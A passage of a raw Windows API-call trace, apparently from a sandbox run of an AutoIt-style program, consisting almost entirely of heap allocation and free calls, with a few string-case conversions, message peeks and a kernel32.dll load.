dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0087.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0087.019] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0087.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0087.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0087.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e30 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0087.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0087.019] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0087.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0087.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0087.020] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0087.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0087.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0087.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0087.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0087.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c80 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0087.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0087.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0087.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0087.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0087.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0087.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0087.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0087.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0087.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0087.022] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0087.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0087.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0087.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0087.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0087.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0087.024] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.027] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0087.027] RtlAllocateHeap (HeapHandle=0x1780000, 